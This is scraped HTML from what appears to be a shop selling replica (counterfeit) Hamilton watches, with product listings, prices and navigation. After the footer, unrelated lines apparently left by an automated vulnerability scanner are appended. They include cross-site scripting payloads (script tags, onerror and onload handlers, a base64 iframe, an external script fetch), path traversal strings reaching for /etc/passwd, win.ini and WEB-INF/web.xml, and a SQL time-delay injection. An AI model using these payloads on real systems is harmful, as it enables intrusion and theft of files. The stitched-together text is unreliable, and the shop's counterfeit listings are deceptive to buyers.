Hamilton Khaki Action H62565733 watch series " width="133" height="200" class="listingProductImage" id="listimg" /></div></a><br /><h3 class="itemTitle"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h62565733-watch-series-p-16545.html">Replica ACTION Hamilton Khaki Action H62565733 watch series</a></h3><div class="listingDescription"></div><br /><span class="normalprice">$1,266.00 </span>&nbsp;<span class="productSpecialPrice">$162.00</span><span class="productPriceDiscount"><br />Save:&nbsp;87% off</span><br /><br />Add: <input type="text" name="products_id[16545]" value="0" size="4" /><br /><br /></div> <div class="centerBoxContentsProducts centeredContent back" style="width:32.5%;"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h63516135-watch-series-p-16547.html"><div style="vertical-align: middle;height:200px"><img src="http://www.firstcopywatches.org/images/_small//xwatches_/Hamilton-watches/Khaki-Series/ACTION-Khaki-Action/Replica-ACTION-Hamilton-Khaki-Action-H63516135.jpg" alt="Replica ACTION Hamilton Khaki Action H63516135 watch series" title=" Replica ACTION Hamilton Khaki Action H63516135 watch series " width="133" height="200" class="listingProductImage" id="listimg" /></div></a><br /><h3 class="itemTitle"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h63516135-watch-series-p-16547.html">Replica ACTION Hamilton Khaki Action H63516135 watch series</a></h3><div class="listingDescription"></div><br /><span class="normalprice">$2,381.00 </span>&nbsp;<span class="productSpecialPrice">$185.00</span><span class="productPriceDiscount"><br />Save:&nbsp;92% off</span><br /><br />Add: <input type="text" name="products_id[16547]" value="0" size="4" /><br /><br /></div> <br class="clearBoth" /><div class="centerBoxContentsProducts centeredContent back" style="width:32.5%;"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h63516735-watch-series-p-16556.html"><div style="vertical-align: middle;height:200px"><img src="http://www.firstcopywatches.org/images/_small//xwatches_/Hamilton-watches/Khaki-Series/ACTION-Khaki-Action/Replica-ACTION-Hamilton-Khaki-Action-H63516735.jpg" alt="Replica ACTION Hamilton Khaki Action H63516735 watch series" title=" Replica ACTION Hamilton Khaki Action H63516735 watch series " width="133" height="200" class="listingProductImage" id="listimg" /></div></a><br /><h3 class="itemTitle"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h63516735-watch-series-p-16556.html">Replica ACTION Hamilton Khaki Action H63516735 watch series</a></h3><div class="listingDescription"></div><br /><span class="normalprice">$2,280.00 </span>&nbsp;<span class="productSpecialPrice">$187.00</span><span class="productPriceDiscount"><br />Save:&nbsp;92% off</span><br /><br />Add: <input type="text" name="products_id[16556]" value="0" size="4" /><br /><br /></div> <div class="centerBoxContentsProducts centeredContent back" style="width:32.5%;"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h63556115-watch-series-p-16551.html"><div style="vertical-align: middle;height:200px"><img src="http://www.firstcopywatches.org/images/_small//xwatches_/Hamilton-watches/Khaki-Series/ACTION-Khaki-Action/Replica-ACTION-Hamilton-Khaki-Action-H63556115.jpg" alt="Replica ACTION Hamilton Khaki Action H63556115 watch series" title=" Replica ACTION Hamilton Khaki Action H63556115 watch series " width="133" height="200" class="listingProductImage" id="listimg" /></div></a><br /><h3 class="itemTitle"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h63556115-watch-series-p-16551.html">Replica ACTION Hamilton Khaki Action H63556115 watch series</a></h3><div class="listingDescription"></div><br /><span class="normalprice">$2,381.00 </span>&nbsp;<span class="productSpecialPrice">$199.00</span><span class="productPriceDiscount"><br />Save:&nbsp;92% off</span><br /><br />Add: <input type="text" name="products_id[16551]" value="0" size="4" /><br /><br /></div> <div class="centerBoxContentsProducts centeredContent back" style="width:32.5%;"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h63556515-watch-series-p-16548.html"><div style="vertical-align: middle;height:200px"><img src="http://www.firstcopywatches.org/images/_small//xwatches_/Hamilton-watches/Khaki-Series/ACTION-Khaki-Action/Replica-ACTION-Hamilton-Khaki-Action-H63556515.jpg" alt="Replica ACTION Hamilton Khaki Action H63556515 watch series" title=" Replica ACTION Hamilton Khaki Action H63556515 watch series " width="133" height="200" class="listingProductImage" id="listimg" /></div></a><br /><h3 class="itemTitle"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h63556515-watch-series-p-16548.html">Replica ACTION Hamilton Khaki Action H63556515 watch series</a></h3><div class="listingDescription"></div><br /><span class="normalprice">$2,280.00 </span>&nbsp;<span class="productSpecialPrice">$191.00</span><span class="productPriceDiscount"><br />Save:&nbsp;92% off</span><br /><br />Add: <input type="text" name="products_id[16548]" value="0" size="4" /><br /><br /></div> <br class="clearBoth" /><div class="centerBoxContentsProducts centeredContent back" style="width:32.5%;"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h63556815-watch-series-p-16555.html"><div style="vertical-align: middle;height:200px"><img src="http://www.firstcopywatches.org/images/_small//xwatches_/Hamilton-watches/Khaki-Series/ACTION-Khaki-Action/Replica-ACTION-Hamilton-Khaki-Action-H63556815.jpg" alt="Replica ACTION Hamilton Khaki Action H63556815 watch series" title=" Replica ACTION Hamilton Khaki Action H63556815 watch series " width="133" height="200" class="listingProductImage" id="listimg" /></div></a><br /><h3 class="itemTitle"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h63556815-watch-series-p-16555.html">Replica ACTION Hamilton Khaki Action H63556815 watch series</a></h3><div class="listingDescription"></div><br /><span class="normalprice">$2,426.00 </span>&nbsp;<span class="productSpecialPrice">$185.00</span><span class="productPriceDiscount"><br />Save:&nbsp;92% off</span><br /><br />Add: <input type="text" name="products_id[16555]" value="0" size="4" /><br /><br /></div> <div class="centerBoxContentsProducts centeredContent back" style="width:32.5%;"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h63556915-watch-series-p-16340.html"><div style="vertical-align: middle;height:200px"><img src="http://www.firstcopywatches.org/images/_small//xwatches_/Hamilton-watches/Khaki-Series/ACTION-Khaki-Action/Replica-ACTION-Hamilton-Khaki-Action-H63556915.jpg" alt="Replica ACTION Hamilton Khaki Action H63556915 watch series" title=" Replica ACTION Hamilton Khaki Action H63556915 watch series " width="133" height="200" class="listingProductImage" id="listimg" /></div></a><br /><h3 class="itemTitle"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h63556915-watch-series-p-16340.html">Replica ACTION Hamilton Khaki Action H63556915 watch series</a></h3><div class="listingDescription"></div><br /><span class="normalprice">$2,641.00 </span>&nbsp;<span class="productSpecialPrice">$197.00</span><span class="productPriceDiscount"><br />Save:&nbsp;93% off</span><br /><br />Add: <input type="text" name="products_id[16340]" value="0" size="4" /><br /><br /></div> <div class="centerBoxContentsProducts centeredContent back" style="width:32.5%;"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h79515333-watch-series-p-16316.html"><div style="vertical-align: middle;height:200px"><img src="http://www.firstcopywatches.org/images/_small//xwatches_/Hamilton-watches/Khaki-Series/ACTION-Khaki-Action/Replica-ACTION-Hamilton-Khaki-Action-H79515333.jpg" alt="Replica ACTION Hamilton Khaki Action H79515333 watch series" title=" Replica ACTION Hamilton Khaki Action H79515333 watch series " width="133" height="200" class="listingProductImage" id="listimg" /></div></a><br /><h3 class="itemTitle"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h79515333-watch-series-p-16316.html">Replica ACTION Hamilton Khaki Action H79515333 watch series</a></h3><div class="listingDescription"></div><br /><span class="normalprice">$1,270.00 </span>&nbsp;<span class="productSpecialPrice">$164.00</span><span class="productPriceDiscount"><br />Save:&nbsp;87% off</span><br /><br />Add: <input type="text" name="products_id[16316]" value="0" size="4" /><br /><br /></div> <br class="clearBoth" /><div class="centerBoxContentsProducts centeredContent back" style="width:32.5%;"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h79515913-watch-series-p-16322.html"><div style="vertical-align: middle;height:200px"><img src="http://www.firstcopywatches.org/images/_small//xwatches_/Hamilton-watches/Khaki-Series/ACTION-Khaki-Action/Replica-ACTION-Hamilton-Khaki-Action-H79515913.jpg" alt="Replica ACTION Hamilton Khaki Action H79515913 watch series" title=" Replica ACTION Hamilton Khaki Action H79515913 watch series " width="133" height="200" class="listingProductImage" id="listimg" /></div></a><br /><h3 class="itemTitle"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h79515913-watch-series-p-16322.html">Replica ACTION Hamilton Khaki Action H79515913 watch series</a></h3><div class="listingDescription"></div><br /><span class="normalprice">$1,270.00 </span>&nbsp;<span class="productSpecialPrice">$175.00</span><span class="productPriceDiscount"><br />Save:&nbsp;86% off</span><br /><br />Add: <input type="text" name="products_id[16322]" value="0" size="4" /><br /><br /></div> <div class="centerBoxContentsProducts centeredContent back" style="width:32.5%;"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h79535333-watch-series-p-16321.html"><div style="vertical-align: middle;height:200px"><img src="http://www.firstcopywatches.org/images/_small//xwatches_/Hamilton-watches/Khaki-Series/ACTION-Khaki-Action/Replica-ACTION-Hamilton-Khaki-Action-H79535333.jpg" alt="Replica ACTION Hamilton Khaki Action H79535333 watch series" title=" Replica ACTION Hamilton Khaki Action H79535333 watch series " width="133" height="200" class="listingProductImage" id="listimg" /></div></a><br /><h3 class="itemTitle"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h79535333-watch-series-p-16321.html">Replica ACTION Hamilton Khaki Action H79535333 watch series</a></h3><div class="listingDescription"></div><br /><span class="normalprice">$1,408.00 </span>&nbsp;<span class="productSpecialPrice">$179.00</span><span class="productPriceDiscount"><br />Save:&nbsp;87% off</span><br /><br />Add: <input type="text" name="products_id[16321]" value="0" size="4" /><br /><br /></div> <div class="centerBoxContentsProducts centeredContent back" style="width:32.5%;"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h79545913-watch-series-p-16315.html"><div style="vertical-align: middle;height:200px"><img src="http://www.firstcopywatches.org/images/_small//xwatches_/Hamilton-watches/Khaki-Series/ACTION-Khaki-Action/Replica-ACTION-Hamilton-Khaki-Action-H79545913.jpg" alt="Replica ACTION Hamilton Khaki Action H79545913 watch series" title=" Replica ACTION Hamilton Khaki Action H79545913 watch series " width="133" height="200" class="listingProductImage" id="listimg" /></div></a><br /><h3 class="itemTitle"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h79545913-watch-series-p-16315.html">Replica ACTION Hamilton Khaki Action H79545913 watch series</a></h3><div class="listingDescription"></div><br /><span class="normalprice">$1,476.00 </span>&nbsp;<span class="productSpecialPrice">$170.00</span><span class="productPriceDiscount"><br />Save:&nbsp;88% off</span><br /><br />Add: <input type="text" name="products_id[16315]" value="0" size="4" /><br /><br /></div> <br class="clearBoth" /><div class="centerBoxContentsProducts centeredContent back" style="width:32.5%;"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h79585333-watch-series-p-16320.html"><div style="vertical-align: middle;height:200px"><img src="http://www.firstcopywatches.org/images/_small//xwatches_/Hamilton-watches/Khaki-Series/ACTION-Khaki-Action/Replica-ACTION-Hamilton-Khaki-Action-H79585333.jpg" alt="Replica ACTION Hamilton Khaki Action H79585333 watch series" title=" Replica ACTION Hamilton Khaki Action H79585333 watch series " width="133" height="200" class="listingProductImage" id="listimg" /></div></a><br /><h3 class="itemTitle"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h79585333-watch-series-p-16320.html">Replica ACTION Hamilton Khaki Action H79585333 watch series</a></h3><div class="listingDescription"></div><br /><span class="normalprice">$1,408.00 </span>&nbsp;<span class="productSpecialPrice">$160.00</span><span class="productPriceDiscount"><br />Save:&nbsp;89% off</span><br /><br />Add: <input type="text" name="products_id[16320]" value="0" size="4" /><br /><br /></div> <div class="centerBoxContentsProducts centeredContent back" style="width:32.5%;"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h79616333-watch-series-p-16313.html"><div style="vertical-align: middle;height:200px"><img src="http://www.firstcopywatches.org/images/_small//xwatches_/Hamilton-watches/Khaki-Series/ACTION-Khaki-Action/Replica-ACTION-Hamilton-Khaki-Action-H79616333.jpg" alt="Replica ACTION Hamilton Khaki Action H79616333 watch series" title=" Replica ACTION Hamilton Khaki Action H79616333 watch series " width="133" height="200" class="listingProductImage" id="listimg" /></div></a><br /><h3 class="itemTitle"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h79616333-watch-series-p-16313.html">Replica ACTION Hamilton Khaki Action H79616333 watch series</a></h3><div class="listingDescription"></div><br /><span class="normalprice">$3,151.00 </span>&nbsp;<span class="productSpecialPrice">$183.00</span><span class="productPriceDiscount"><br />Save:&nbsp;94% off</span><br /><br />Add: <input type="text" name="products_id[16313]" value="0" size="4" /><br /><br /></div> <div class="centerBoxContentsProducts centeredContent back" style="width:32.5%;"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h79636333-watch-series-p-16275.html"><div style="vertical-align: middle;height:200px"><img src="http://www.firstcopywatches.org/images/_small//xwatches_/Hamilton-watches/Khaki-Series/ACTION-Khaki-Action/Replica-ACTION-Hamilton-Khaki-Action-H79636333.jpg" alt="Replica ACTION Hamilton Khaki Action H79636333 watch series" title=" Replica ACTION Hamilton Khaki Action H79636333 watch series " width="133" height="200" class="listingProductImage" id="listimg" /></div></a><br /><h3 class="itemTitle"><a href="http://www.firstcopywatches.org/replica-action-hamilton-khaki-action-h79636333-watch-series-p-16275.html">Replica ACTION Hamilton Khaki Action H79636333 watch series</a></h3><div class="listingDescription"></div><br /><span class="normalprice">$3,363.00 </span>&nbsp;<span class="productSpecialPrice">$193.00</span><span class="productPriceDiscount"><br />Save:&nbsp;94% off</span><br /><br />Add: <input type="text" name="products_id[16275]" value="0" size="4" /><br /><br /></div> <br class="clearBoth" /> <div id="productsListingBottomNumber" class="navSplitPagesResult back">Displaying <strong>1</strong> to <strong>24</strong> (of <strong>476</strong> products)</div> <div id="productsListingListingBottomLinks" class="navSplitPagesLinks forward"> &nbsp;<strong class="current">1</strong>&nbsp;&nbsp;<a href="http://www.firstcopywatches.org/replica-hamilton-c-8.html?page=2&sort=20a" title=" Page 2 ">2</a>&nbsp;&nbsp;<a href="http://www.firstcopywatches.org/replica-hamilton-c-8.html?page=3&sort=20a" title=" Page 3 ">3</a>&nbsp;&nbsp;<a href="http://www.firstcopywatches.org/replica-hamilton-c-8.html?page=4&sort=20a" title=" Page 4 ">4</a>&nbsp;&nbsp;<a href="http://www.firstcopywatches.org/replica-hamilton-c-8.html?page=5&sort=20a" title=" Page 5 ">5</a>&nbsp;<a href="http://www.firstcopywatches.org/replica-hamilton-c-8.html?page=6&sort=20a" title=" Next Set of 5 Pages ">...</a>&nbsp;&nbsp;<a href="http://www.firstcopywatches.org/replica-hamilton-c-8.html?page=20&sort=20a" title=" Page 20 ">20</a>&nbsp;&nbsp;<a href="http://www.firstcopywatches.org/replica-hamilton-c-8.html?page=2&sort=20a" title=" Next Page ">[Next&nbsp;&gt;&gt;]</a>&nbsp;</div> <br class="clearBoth" /> <div class="buttonRow forward"><input type="image" src="http://www.firstcopywatches.org/includes/templates/polo/buttons/english/button_add_selected.gif" alt="Add Selected Products to Cart" title=" Add Selected Products to Cart " id="submit2" name="submit1" /></div> <br class="clearBoth" /> </div> </form> </div> </td> </tr> </table> </div> <div id="navSuppWrapper"> <br class="clearBoth" /> <div id="navSupp" style=" margin-bottom:10px; margin-top:8px; width:100%; text-align:center;"> <a style="color:#000; font:12px;" href="http://www.firstcopywatches.org/index.php">Home</a>&nbsp;&nbsp; <a style="color:#000; font:12px;" href="http://www.firstcopywatches.org/index.php?main_page=shippinginfo">Shipping</a>&nbsp;&nbsp; <a style="color:#000; font:12px;" href="http://www.firstcopywatches.org/index.php?main_page=Payment_Methods">Wholesale</a>&nbsp;&nbsp; <a style="color:#000; font:12px;" href="http://www.firstcopywatches.org/index.php?main_page=shippinginfo">Order Tracking</a>&nbsp;&nbsp; <a style="color:#000; font:12px;" href="http://www.firstcopywatches.org/index.php?main_page=Coupons">Coupons</a>&nbsp;&nbsp; <a style="color:#000; font:12px;" href="http://www.firstcopywatches.org/index.php?main_page=Payment_Methods">Payment Methods</a>&nbsp;&nbsp; <a style="color:#000; font:12px;" href="http://www.firstcopywatches.org/index.php?main_page=contact_us">Contact Us</a>&nbsp;&nbsp; </div> <div style=" margin-bottom:10px; margin-top:10px; width:100%; text-align:center;"> <a style="font-weight:bold; color:#000;" href="http://www.replicawatchesforsales.com/" target="_blank">REPLICA OMEGA</a> &nbsp;&nbsp; <a style="font-weight:bold; color:#000;" href="http://www.replicawatchesforsales.com/" target="_blank">REPLICA PATEK PHILIPPE </a> &nbsp;&nbsp; <a style="font-weight:bold; color:#000;" href="http://www.replicawatchesforsales.com/" target="_blank">REPLICA ROLEX </a> &nbsp;&nbsp; <a style="font-weight:bold; color:#000;" href="http://www.replicawatchesforsales.com" target="_blank">REPLICA IWC </a>&nbsp;&nbsp; <a style="font-weight:bold; color:#000;" href="http://www.replicawatchesforsales.com/" target="_blank">REPLICA CARTIER </a>&nbsp;&nbsp; <a style="font-weight:bold; color:#000;" href="http://www.replicawatchesforsales.com/" target="_blank">TOP BRAND WATCHES </a>&nbsp;&nbsp; </div> <DIV align="center"> <a href="http://www.firstcopywatches.org/replica-hamilton-c-8.html" ><IMG src="http://www.firstcopywatches.org/includes/templates/polo/images/payment.png" width="672" height="58"></a> </DIV> <div align="center" style="color:#000;">Copyright © 2012 All Rights Reserved. </div> </div> </div> <strong><a href="http://www.firstcopywatches.org/">replica patek philippe</a></strong> <br> <strong><a href="http://www.firstcopywatches.org/">replica watch for men</a></strong> <br>
muoaytfi fiquotyn
1
muoaytfi fiquotyn
1
1;pBWj6 <ScRiPt >prompt(955803)</ScRiPt>
<a href='http://www.acunetix.com'>website security</a>
[url=http://www.acunetix.com]website security[/url]
1<input autofocus onfocus=prompt(996662)>
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
1%3cScRiPt%20%3eprompt(914510)%3c%2fsCripT%3e
WEB-INF/web.xml
WEB-INF\web.xml
................windowswin.ini
1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(925387)>
..\..\..\..\..\..\..\..\windows\win.ini
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
1<img src=xyz OnErRor=prompt(978379)>
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
1<img/src=">" onerror=alert(987914)>
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
WEB-INF\web.xml
../../../../../../../../../../windows/win.ini
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='958072'>
../../../../../../../../../../boot.ini
1<body onload=prompt(933537)>
../../../../../../../../../../windows/win.ini.jpg
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
1<video><source onerror="javascript:prompt(904764)">
..
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(938466)"></g></svg>
file:///etc/passwd
/\../\../\../\../\../\../\../etc/passwd
1<div style=width:expression(prompt(941766))>
WEB-INF/web.xml
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?951042></ScRiPt>
/../..//../..//../..//../..//../..//etc/passwd.jpg
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
/etc/passwd
1<ScRiPt >prompt(984981)</ScRiPt>
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
../../../../../../../../../../etc/passwd
1; waitfor delay '0:0:4' --
